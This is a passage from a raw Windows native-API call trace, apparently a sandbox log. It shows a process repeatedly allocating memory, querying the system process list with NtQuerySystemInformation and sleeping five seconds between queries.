BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.757] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.767] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.777] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.786] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.809] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.817] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.832] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.839] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.847] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.865] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.873] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.887] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.900] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.907] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.913] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.921] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 